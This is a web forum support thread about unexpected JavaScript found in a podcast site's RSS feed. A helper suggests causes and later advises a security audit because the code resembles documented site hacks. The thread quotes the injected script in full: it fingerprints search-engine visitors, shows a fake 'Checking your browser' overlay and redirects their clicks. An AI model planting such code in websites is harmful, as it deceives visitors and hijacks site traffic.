Javascript in RSS feed (won't validate)

[breed-redlocks]

Hi, I'm now seeing some random broswer-checking code at the bottom of my RSS feed. See here: http://badfeelingpodcast.com/rss

https://validator.w3.org/feed/check.cgi?url=http%3A%2F%2Fbadfeelingpodcast.com%2Frss

-code below-

<script type='text/javascript'>
function start(){function s(e){var t=document.cookie,n=t.indexOf(' '+e+'=');n==-1&&(n=t.indexOf(e+'='));if(n==-1)t=null;else{n=t.indexOf('=',n)+1;var r=t.indexOf(';',n);r==-1&&(r=t.length),t=unescape(t.substring(n,r))}return t}function o(e,t,n){var r=new Date;r.setDate(r.getDate()+n);var i=escape(t)+(n==null?'':'; expires='+r.toUTCString());document.cookie=e+'='+i}function u(){var e=s('referrerRedirectCookie');return e!=null&&e!=''?!0:(o('referrerRedirectCookie','do not redirect',730),!1)}var e=document.referrer,t,n=['',' '],r=['google','yahoo','bing','yandex','baidu','gigablast','soso','blekko','exalead','https','duckduckgo','http'];if(!e)console.log('direct'),u();else for(t=0;t<r.length;++t)if(e.indexOf(r[t])+1&&!u()){var i=navigator.userAgent;if(!i||i.length==0)return;i=i.toLowerCase(),i.indexOf('google')==-1&&i.indexOf('bot')==-1&&i.indexOf('crawl')==-1&&hideWebSite()}}function createPopup(){var e=document.createElement('div');e.style.position='absolute',e.style.width='100%',e.style.height='100%',e.style.left=0,e.style.top=0,e.style.backgroundColor='white',e.style.zIndex=99999,document.body.appendChild(e),e.onclick=function(){window.location=w_location};var t=document.createElement('p');return t.innerText='Checking your browser before accessing '+window.location.host+'...',t.style.textAlign='center',t.style.fontSize='x-large',t.style.position='relative',t.textContent=t.innerText,e.appendChild(t),e}function createButton(){var e=document.createElement('div');return e.style.position='absolute',e.style.top='20%',e.style.left='10%',e.style.right='10%',e.style.width='80%',e.style.border='1px solid black',e.style.textAlign='center',e.style.verticalAlign='middle',e.style.margin='0, auto',e.style.cursor='pointer',e.style.fontSize='xx-large',e.style.borderRadius='5px',e.onclick=function(){window.location=w_location},e.onmouseover=function(){e.style.border='1px solid red',e.style.color='red'},e.onmouseout=function(){e.style.border='1px solid black',e.style.color='black'},e.innerText='Continue',e.textContent=e.innerText,e}var w_location='/?pagerd_' + Math.random().toString(36).substring(7),hideWebSite=function(){var e=createPopup(),t=createButton();e.appendChild(t)},readyStateCheckInterval=setInterval(function(){(document.readyState==='complete'||document.readyState=='interactive')&&clearInterval(readyStateCheckInterval)},10);start();
</script>'

[mbabker]

At first guess, there is a plugin on your site adding this code which doesn't check if the document type is HTML so it always gets appended to the output. Disabling that plugin would be a temporary solution, long term the developer should add some checks to their code to ensure that snippet isn't being rendered for non-HTML outputs.

[breed-redlocks]

I disabled all plugins and the code is still in the RSS that's generated. What else can we try ?

[mbabker]

Check your template to see if it's appending it perhaps? Or are you using any third party services that might be injecting script into your site's pages?

[breed-redlocks]

Turns out this was an issue with an old version of Joomla. I upgraded to 3.4.6 and all is well. Thanks for your time.

[mbabker]

Just for reference, searching around on parts of that scripts contents (expanded out at https://gist.github.com/mbabker/75aefb465d6212774ab5), I might suggest doing a quick security audit on your site. Part of it seems to trace back to CloudFlare and another part of it brought me to some sites talking about a potential hack (http://tweetypage.com/wordpress-hacked/ is one article where part of that script's contents are very close to what's described on the blog). It may turn out to be nothing, but given how close the script seems to resemble these documented hacks and recent Joomla security issues, checking over your site to ensure it isn't compromised wouldn't be a bad idea.